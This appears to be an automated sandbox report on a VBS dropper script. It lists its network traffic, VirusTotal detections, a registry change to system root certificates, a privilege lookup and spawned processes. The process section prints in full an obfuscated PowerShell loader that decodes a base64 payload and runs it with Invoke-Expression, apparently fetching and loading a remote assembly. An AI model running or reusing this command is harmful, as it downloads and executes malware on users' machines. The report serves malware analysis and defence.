Ð¨¦º§ªÒQy´Ô×?A<îá¹[°NZÐ&?£3¡þÿS¼pQt¹øsjF0Òw¶Ø¨pS8Ou¦ GÜ©9=-iÑaÜý·;RÙkT3zbZüÓTÀÌ$ß9oøÞ(ÐólO\|C¤#Ð1X§ªåFG¤TÙ»ãÏd3àL>^fä®<,ìÒ0ùDÎáI0õuH»åêÊ¨wÜj¯hYE@K{aw=ìÏP!T:G ^BOòÀTGsÙ¿c]x¥&¹¨=ÊÖ()ÚÌ&Ú?hÍÓ¸#ÃæþN81ÿ\|ßR\{@0ÁÍ:,¯¢U×¸ûÏÄØ:ï¼ÐºeæK iå¢bÖïC·ä¼â÷¥´!Ï ã[çåwN7g¸·í7={øBö#Yù²pç!²jÌ¡gÍ¾m×mrTDIý}0ÊxêµÉvµô)zÕ®Î4~\fÏËø.§¬Í]JôW§ÁwöÌêqxËÌ'Å9»8îáºt: ¢&ZÿwdócÂ¹ä)ÓL; )â5;rñÌ¥©ò[ïiõðÊ;XWªyî¦®"ÏÄb]Û¥ÝàÅ×¸òãJþdÀ?Oð/a$iÞ5Ù-ärÏtÉ@ªÁ#öÎ#exR"n8×èbìIª úéñ7m z¦%8##$ Xã\|^-]¥P<%²Æ¹èsâqP'ÑÏÔâ=ÕE eS¯¯E®8A'¦n%º^ËØ´¦.ç÷02âÙÜUî0iHî¡h»æ`g}Zþwuç^AsiÑ5²áí{fg»MºÒÅå;§È¯xkÜëñíÛÕøÏÜ¢jh¼9öõâ¬¿íwÍÐü,gØ¯ÍÁïþô\|VNGqnU¤ù\Ý0¤¾V:r%d¨Ø¡qYã®VTD ò)ëênÈhq±¨h²ãs@I¾-?rÌ£Õ18d÷ÃëÓî¨ÂðY]ùÒFÆÚ%[)Ð %¶¥o>0 Bé¹ØÔ£\|kGûùõP÷úð/õÁõ³ÿ@R½Ip90¢[ï2B°h¦1÷k¦`e¨íS(6Ã û¼¥ k¤TWpd-³O £zÆüÕx7hÉóÕ\Täå¬ÝÇ"Á[lÁ,óÑ£µÁ¨n=hvªÉè¸GOüVÀ°¥{=k
Data received	°³}¸ÿxWt»dÚÿâR:¤Dõò=eP
Data received	róm=-Um¼â\Ðm ÿÊ\|êØ@Å¨¢
Data received	;)£aÙôRçì3ÍÞ<ú®ÄS"¡W8Ñ.Fî
Data received	Í»©»hS(^Üª§R(ÓåË÷ÉX`Y4ê
Data received	\É².·YKñ¤DPG«osÓAT¿
Data received	¿â-ÅÜÖIéÒß1å«c«KÄòàvpH
Data received	'+ºZ2ÝrÌop×'w£¿ 2¹l8&½ îBÜmîg{PâpÚ¬Ú½ÁhK¶-x@ ¤HÛ{ñ)£yû°b2ÅJ´J¥ «oi¹àìL§OX2ÎírÕ²Ë oÙÅÞM÷®]}Ný oÆ1-ö7ô$Q4hGVh¶â&u¦ôÎIì¦ÓjDð¢ýøÜ¯y&oÆ'eC(ÖÉkõÃ ü+Ð»<)àO¾#kÕst":ÔGÜ¯^¾1¡<ulvÛÎ"òIXp;¼8¤ù]ûg_=Ñú^Xvd øò äbºæäV~]«Õì:SÓÖBòyøuã&ZýUôëÐ4º³Ë&ú&Ð4nO#ôÃÃS+¾cAçQ{Ê¼MXMGvêjÅsÿzp(4´É¹¼À·M¨êÞÖæ<j&SÁ£ÄlB£P¨ÖY\|uE±ÇÜ#ô¦{I(k'×ÚòIc=#ú1\|J¿]à²çò(ÀÂoY£eXïÍÿs6°Âr¨B¶3÷ ú'© æãhÐÕ1/YÝnñlÒº;o5)gò_]¸}KÔû\|UKùK§áP'÷b\Ý²':¸»s>Ì£¹ÙKÌø&}Ñ¬¤÷«V@üïdY0k/ÄÙf>fYªx¡:'ÑcqijPÂü¶xzê=¬ßüÀÁìHàòÙó£³röØ1ÄJXÓcÃD2¬d©4¨«Ræ+Û²R0/CfÒûjãhn+þÐk=ù]í1PôÆ³[ÊÉÓ.mß3£p:_ûc@ ©HÊºI0¸&s²oûÚN ; V5ª,²Ç¹kgò6þÏGúÀysÆl¾ßÂfaù{ø¸^®f2sácêhÓx®¾Î0ØøÔí¬ò·ö=;Ù{äf[(ø:ÒµÍ÷6'GÌÈ&ÐÕj2¥Ì©Je GL©Ó+vwW@íäÃ«§PìuÂ þïß\|pÐ¼2NÞ!;9®Zö%}½NÈL+£!g±~ _Óz v£8CêKnZ£4»yfÀBªñé5½ÚÀÆ$üÉWë£# s2ÿ+ÿ×3ãøºKK[C¥¼¸¿.PP-tOv÷YÊïu`SùKÒÏo'¼}Ð ÆRè®þ´>"/ÉcqsûdÜvn½ji¢³íäo]<.¬ø4LÄóÊÊá£ñs\|IÛ¬#Í¸ILjã£Þ¼qk/ã¹Ç·ÔOÌ¯°â<-'[ÕÞUfÖH¶º[&oÉd¶Þúa.vÿº¥·pÛêÉJÿ¡ÖG2NêÁ´äþLvå³â5½y³¶Aî8BN_F<!Ëæ´É<[ÿMÅAzÐ}; ê\D¢&ù³OÁ!\|OhHôfÅ>ý¸,òlðËRÙ³<§q ^®sdÃw;M!ÑYI µ{^J6¤ÉHã² éÓË£ñKúºÐCÙtLd/ÛS§¹'ÞÄ¨°ûæC§ì¥à<dÐ1;¨¦²nf·t¬Ë#äöÙÑµ«ÕÜÁTës·ªP[¸çâÍSªU(lÀynÃ«rh +}Ä#« v\dÄY´üº´9RH+üõ¶U± »sy&ùÎoÍ<w§auJú$&òr53®u%Ôy4û~ý!þ1g£^\|çÈP¬g£°T14îFdn58ºèbUjûÌè p(û)þg=jSËÍYµ)F ÜÙjÄAámkA¼áä÷Ð¾¸ø¿tÿdkü/¬P )\|M+ÐqW_úþu·_LíÇR¤h bF +M]fÜù°Ú/4'²}ÆAÆhßáÙWÿD°n]ÍDLµtCvLÊ%ì@q«ãaåÓ>ýÀTD¬¨þÛy]ZÆk^QÛÛ¯ÕH. ²ÿhlU£o^î¢Ph/§â*GbðÚhs ·½û¹+HìÁ§k^¶FÆY¯îØ~òÙr\
Data received	j+®$Y~9Ø>ÑQc§tÐú>â²»ÛLÍ

Poweshell is sending data to a remote host (3 events)

Data sent	tpgÅAºk#c.g;nç%tW"BPBÖW.1/5 ÀÀÀ À 28/ÿ1007.filemail.com
Data sent	FBASþùDÓm¦¹y3»ëß/Ì)ö ;Î7oÇ¬¼ÛQâ!«Zü¯çHä¼kí¯Í]Q 8µ0\|\àMñh£öìÐ¯®òJL:Ùk&]ö$Õ·!.ÚÈÃXXmÀ'Åæ
Data sent	àÄH¶ÉÎ¼%~uâÎJÀ=°~Js¶\øL{¨³m÷Xµ"=þ]º[ÎÆrÎ:KÅ*k¼ØV\|à^xØ)ÀKóîe%(Y\Y-\|C²<råXÿíñâf·{¬ñ³#©ò£9¿¸·Æ§ÉÖ® ©Ô[\|{µ§9ÌQüA ÷Ær\ªÌRÒÄ§\|ü¯Ûgú£zÉQ/·Aôí³ç\|IéÅì¾ÂZÎ0 Øl@aÚËÞ%4yÆ Fò¶cÄûÝÄ³®jÿ

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW March 3, 2025, 2:44 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

File has been identified by 11 AntiVirus engines on VirusTotal as malicious (11 events)

Skyhigh	BehavesLike.VBS.Dropper.cp
Avast	Script:SNH-gen [Trj]
Kaspersky	HEUR:Trojan.Script.Generic
Ikarus	Trojan-Downloader.VBS.Agent
Google	Detected
Kingsoft	Script.Trojan.Generic.a
Microsoft	Trojan:Script/Wacatac.B!ml
GData	Script.Trojan.Agent.E1C3DC
huorong	HEUR:TrojanDownloader/VBS.Agent.r
Fortinet	VBS/Agent.ABPS!tr
AVG	Script:SNH-gen [Trj]

Attempts to create or modify system certificates (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F81F111D0E5AB58D396F7BF525577FD30FDC95AA\Blob

Network communications indicative of a potential document or script payload download was initiated by the process powershell.exe (3 events)

Time & API	Arguments	Status	Return
send March 3, 2025, 2:44 p.m.	buffer: tpgÅAºk#c.g;nç%tW"BPBÖW.1/5 ÀÀÀ À 28/ÿ1007.filemail.com socket: 1420 sent: 121	1	121
send March 3, 2025, 2:44 p.m.	buffer: FBASþùDÓm¦¹y3»ëß/Ì)ö ;Î7oÇ¬¼ÛQâ!«Zü¯çHä¼kí¯Í]Q 8µ0\|\àMñh£öìÐ¯®òJL:Ùk&]ö$Õ·!.ÚÈÃXXmÀ'Åæ socket: 1420 sent: 134	1	134
send March 3, 2025, 2:44 p.m.	buffer: àÄH¶ÉÎ¼%~uâÎJÀ=°~Js¶\øL{¨³m÷Xµ"=þ]º[ÎÆrÎ:KÅ*k¼ØV\|à^xØ)ÀKóîe%(Y\Y-\|C²<råXÿíñâf·{¬ñ³#©ò£9¿¸·Æ§ÉÖ® ©Ô[\|{µ§9ÌQüA ÷Ær\ªÌRÒÄ§\|ü¯Ûgú£zÉQ/·Aôí³ç\|IéÅì¾ÂZÎ0 Øl@aÚËÞ%4yÆ Fò¶cÄûÝÄ³®jÿ socket: 1420 sent: 229	1	229

One or more non-whitelisted processes were created (2 events)

parent_process	wscript.exe				martian_process	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "$Codigo = 'J#BC#GE#YwBj#Gg#YQBu#GE#b#Bp#GE#bgBz#C##PQ#g#Cc#d#B4#HQ#Lg#0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DY#ZQBz#GE#Yg#v#Dc#MQ#u#D##Mg#y#C4#Mw#u#DI#OQ#x#C8#Lw#6#H##d#B0#Gg#Jw#7#CQ#Z#By#HU#ZwBn#Gk#ZQBz#HQ#I##9#C##J#BC#GE#YwBj#Gg#YQBu#GE#b#Bp#GE#bgBz#C##LQBy#GU#c#Bs#GE#YwBl#C##Jw#j#Cc#L##g#Cc#d##n#Ds#J#BE#G8#bgBj#GE#cwB0#GU#cg#g#D0#I##n#Gg#d#B0#H##cw#6#C8#Lw#x#D##M##3#C4#ZgBp#Gw#ZQBt#GE#aQBs#C4#YwBv#G0#LwBh#H##aQ#v#GY#aQBs#GU#LwBn#GU#d##/#GY#aQBs#GU#awBl#Hk#PQBF#FM#WQBU#Gk#V#BS#DM#Tw#w#DM#RQ#1#HE#cgBN#G4#SQB5#Hk#VwB0#Fk#Zg#1#E8#TQBG#FU#M#Bt#GE#awB4#E0#dQ#w#GU#U#Bx#FI#UgBK#E4#aQBj#E4#agBD#DM#NgBh#Dg#V##y#Go#RwBm#Fc#V##2#EY#RQBC#Go#NQBz#CY#c#Br#F8#dgBp#GQ#PQ#z#DQ#Mg#4#D##MwBk#DE#YwBj#DQ#ZQ#z#GI#O##w#DE#Nw#0#D##Ng#2#Dc#M##1#D##O##w#GE#NQBl#GY#Jw#7#CQ#c#Bh#HI#aQB0#Gk#ZQBz#C##PQ#g#E4#ZQB3#C0#TwBi#Go#ZQBj#HQ#I#BT#Hk#cwB0#GU#bQ#u#E4#ZQB0#C4#VwBl#GI#QwBs#Gk#ZQBu#HQ#Ow#k#GE#c#Bw#HI#YQBp#HM#ZQBy#HM#I##9#C##J#Bw#GE#cgBp#HQ#aQBl#HM#LgBE#G8#dwBu#Gw#bwBh#GQ#R#Bh#HQ#YQ#o#CQ#R#Bv#G4#YwBh#HM#d#Bl#HI#KQ#7#CQ#c#By#G8#YwBy#GE#cwB0#Gk#bgBh#HQ#bwBy#HM#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#FQ#ZQB4#HQ#LgBF#G4#YwBv#GQ#aQBu#Gc#XQ#6#Do#VQBU#EY#O##u#Ec#ZQB0#FM#d#By#Gk#bgBn#Cg#J#Bh#H##c#By#GE#aQBz#GU#cgBz#Ck#Ow#k#GI#b#Bl#H##a#Bh#HI#YQ#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#FM#V#BB#FI#V##+#D4#Jw#7#CQ#c#Bp#GM#cgBv#Gc#b#B5#GM#aQBv#G4#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBF#E4#R##+#D4#Jw#7#CQ#cwB1#Gk#YwBp#GQ#ZQ#g#D0#I##k#H##cgBv#GM#cgBh#HM#d#Bp#G4#YQB0#G8#cgBz#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#YgBs#GU#c#Bo#GE#cgBh#Ck#Ow#k#G0#ZQBh#GQ#bwB3#C##PQ#g#CQ#c#By#G8#YwBy#GE#cwB0#Gk#bgBh#HQ#bwBy#HM#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bw#Gk#YwBy#G8#ZwBs#Hk#YwBp#G8#bg#p#Ds#J#Bz#HU#aQBj#Gk#Z#Bl#C##LQBn#GU#I##w#C##LQBh#G4#Z##g#CQ#bQBl#GE#Z#Bv#Hc#I##t#Gc#d##g#CQ#cwB1#Gk#YwBp#GQ#ZQ#7#CQ#cwB1#Gk#YwBp#GQ#ZQ#g#Cs#PQ#g#CQ#YgBs#GU#c#Bo#GE#cgBh#C4#T#Bl#G4#ZwB0#Gg#Ow#k#GE#ZwBr#Gk#cwB0#HI#bwBk#G8#bg#g#D0#I##k#G0#ZQBh#GQ#bwB3#C##LQ#g#CQ#cwB1#Gk#YwBp#GQ#ZQ#7#CQ#YwBy#Hk#cwB0#GE#b##g#D0#I##k#H##cgBv#GM#cgBh#HM#d#Bp#G4#YQB0#G8#cgBz#C4#UwB1#GI#cwB0#HI#aQBu#Gc#K##k#HM#dQBp#GM#aQBk#GU#L##g#CQ#YQBn#Gs#aQBz#HQ#cgBv#GQ#bwBu#Ck#Ow#k#GM#bwBt#H##YQBn#Gk#bgBh#HQ#ZQ#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#QwBv#G4#dgBl#HI#d#Bd#Do#OgBG#HI#bwBt#EI#YQBz#GU#Ng#0#FM#d#By#Gk#bgBn#Cg#J#Bj#HI#eQBz#HQ#YQBs#Ck#Ow#k#Ho#bwBh#G4#d#Bo#G8#Z#Bl#G0#aQBj#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBS#GU#ZgBs#GU#YwB0#Gk#bwBu#C4#QQBz#HM#ZQBt#GI#b#B5#F0#Og#6#Ew#bwBh#GQ#K##k#GM#bwBt#H##YQBn#Gk#bgBh#HQ#ZQ#p#Ds#J#Bn#HI#YQB2#Gk#Z#Bh#HQ#ZQ#g#D0#I#Bb#GQ#bgBs#Gk#Yg#u#Ek#Tw#u#Eg#bwBt#GU#XQ#u#Ec#ZQB0#E0#ZQB0#Gg#bwBk#Cg#JwBW#EE#SQ#n#Ck#LgBJ#G4#dgBv#Gs#ZQ#o#CQ#bgB1#Gw#b##s#C##WwBv#GI#agBl#GM#d#Bb#F0#XQ#g#E##K##k#GQ#cgB1#Gc#ZwBp#GU#cwB0#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#JwBN#FM#QgB1#Gk#b#Bk#Cc#L##n#Cc#L##n#Cc#L##n#Cc#L##n#Cc#L##n#Cc#L##n#Cc#L##n#Cc#L##n#Cc#L##n#Cc#L##n#Cc#KQ#p##=='; $OWjuxd = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Codigo.Replace('#','A'))); Invoke-Expression $OWjuxd"
parent_process	wscript.exe				martian_process	powershell -NoProfile -Command "$Codigo = 'J#BC#GE#YwBj#Gg#YQBu#GE#b#Bp#GE#bgBz#C##PQ#g#Cc#d#B4#HQ#Lg#0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DY#ZQBz#GE#Yg#v#Dc#MQ#u#D##Mg#y#C4#Mw#u#DI#OQ#x#C8#Lw#6#H##d#B0#Gg#Jw#7#CQ#Z#By#HU#ZwBn#Gk#ZQBz#HQ#I##9#C##J#BC#GE#YwBj#Gg#YQBu#GE#b#Bp#GE#bgBz#C##LQBy#GU#c#Bs#GE#YwBl#C##Jw#j#Cc#L##g#Cc#d##n#Ds#J#BE#G8#bgBj#GE#cwB0#GU#cg#g#D0#I##n#Gg#d#B0#H##cw#6#C8#Lw#x#D##M##3#C4#ZgBp#Gw#ZQBt#GE#aQBs#C4#YwBv#G0#LwBh#H##aQ#v#GY#aQBs#GU#LwBn#GU#d##/#GY#aQBs#GU#awBl#Hk#PQBF#FM#WQBU#Gk#V#BS#DM#Tw#w#DM#RQ#1#HE#cgBN#G4#SQB5#Hk#VwB0#Fk#Zg#1#E8#TQBG#FU#M#Bt#GE#awB4#E0#dQ#w#GU#U#Bx#FI#UgBK#E4#aQBj#E4#agBD#DM#NgBh#Dg#V##y#Go#RwBm#Fc#V##2#EY#RQBC#Go#NQBz#CY#c#Br#F8#dgBp#GQ#PQ#z#DQ#Mg#4#D##MwBk#DE#YwBj#DQ#ZQ#z#GI#O##w#DE#Nw#0#D##Ng#2#Dc#M##1#D##O##w#GE#NQBl#GY#Jw#7#CQ#c#Bh#HI#aQB0#Gk#ZQBz#C##PQ#g#E4#ZQB3#C0#TwBi#Go#ZQBj#HQ#I#BT#Hk#cwB0#GU#bQ#u#E4#ZQB0#C4#VwBl#GI#QwBs#Gk#ZQBu#HQ#Ow#k#GE#c#Bw#HI#YQBp#HM#ZQBy#HM#I##9#C##J#Bw#GE#cgBp#HQ#aQBl#HM#LgBE#G8#dwBu#Gw#bwBh#GQ#R#Bh#HQ#YQ#o#CQ#R#Bv#G4#YwBh#HM#d#Bl#HI#KQ#7#CQ#c#By#G8#YwBy#GE#cwB0#Gk#bgBh#HQ#bwBy#HM#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#FQ#ZQB4#HQ#LgBF#G4#YwBv#GQ#aQBu#Gc#XQ#6#Do#VQBU#EY#O##u#Ec#ZQB0#FM#d#By#Gk#bgBn#Cg#J#Bh#H##c#By#GE#aQBz#GU#cgBz#Ck#Ow#k#GI#b#Bl#H##a#Bh#HI#YQ#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#FM#V#BB#FI#V##+#D4#Jw#7#CQ#c#Bp#GM#cgBv#Gc#b#B5#GM#aQBv#G4#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBF#E4#R##+#D4#Jw#7#CQ#cwB1#Gk#YwBp#GQ#ZQ#g#D0#I##k#H##cgBv#GM#cgBh#HM#d#Bp#G4#YQB0#G8#cgBz#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#YgBs#GU#c#Bo#GE#cgBh#Ck#Ow#k#G0#ZQBh#GQ#bwB3#C##PQ#g#CQ#c#By#G8#YwBy#GE#cwB0#Gk#bgBh#HQ#bwBy#HM#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bw#Gk#YwBy#G8#ZwBs#Hk#YwBp#G8#bg#p#Ds#J#Bz#HU#aQBj#Gk#Z#Bl#C##LQBn#GU#I##w#C##LQBh#G4#Z##g#CQ#bQBl#GE#Z#Bv#Hc#I##t#Gc#d##g#CQ#cwB1#Gk#YwBp#GQ#ZQ#7#CQ#cwB1#Gk#YwBp#GQ#ZQ#g#Cs#PQ#g#CQ#YgBs#GU#c#Bo#GE#cgBh#C4#T#Bl#G4#ZwB0#Gg#Ow#k#GE#ZwBr#Gk#cwB0#HI#bwBk#G8#bg#g#D0#I##k#G0#ZQBh#GQ#bwB3#C##LQ#g#CQ#cwB1#Gk#YwBp#GQ#ZQ#7#CQ#YwBy#Hk#cwB0#GE#b##g#D0#I##k#H##cgBv#GM#cgBh#HM#d#Bp#G4#YQB0#G8#cgBz#C4#UwB1#GI#cwB0#HI#aQBu#Gc#K##k#HM#dQBp#GM#aQBk#GU#L##g#CQ#YQBn#Gs#aQBz#HQ#cgBv#GQ#bwBu#Ck#Ow#k#GM#bwBt#H##YQBn#Gk#bgBh#HQ#ZQ#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#QwBv#G4#dgBl#HI#d#Bd#Do#OgBG#HI#bwBt#EI#YQBz#GU#Ng#0#FM#d#By#Gk#bgBn#Cg#J#Bj#HI#eQBz#HQ#YQBs#Ck#Ow#k#Ho#bwBh#G4#d#Bo#G8#Z#Bl#G0#aQBj#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBS#GU#ZgBs#GU#YwB0#Gk#bwBu#C4#QQBz#HM#ZQBt#GI#b#B5#F0#Og#6#Ew#bwBh#GQ#K##k#GM#bwBt#H##YQBn#Gk#bgBh#HQ#ZQ#p#Ds#J#Bn#HI#YQB2#Gk#Z#Bh#HQ#ZQ#g#D0#I#Bb#GQ#bgBs#Gk#Yg#u#Ek#Tw#u#Eg#bwBt#GU#XQ#u#Ec#ZQB0#E0#ZQB0#Gg#bwBk#Cg#JwBW#EE#SQ#n#Ck#LgBJ#G4#dgBv#Gs#ZQ#o#CQ#bgB1#Gw#b##s#C##WwBv#GI#agBl#GM#d#Bb#F0#XQ#g#E##K##k#GQ#cgB1#Gc#ZwBp#GU#cwB0#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#JwBN#FM#QgB1#Gk#b#Bk#Cc#L##n#Cc#L##n#Cc#L##n#Cc#L##n#Cc#L##n#Cc#L##n#Cc#L##n#Cc#L##n#Cc#L##n#Cc#L##n#Cc#KQ#p##=='; $OWjuxd = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Codigo.Replace('#','A'))); Invoke-Expression $OWjuxd"

Creates a suspicious Powershell process (2 events)

option	-noprofile				value	Does not load current user profile
option	-noprofile				value	Does not load current user profile

The process wscript.exe wrote an executable file to disk which it then attempted to execute (1 event)

file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Tuesdayconstraints.vbs

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All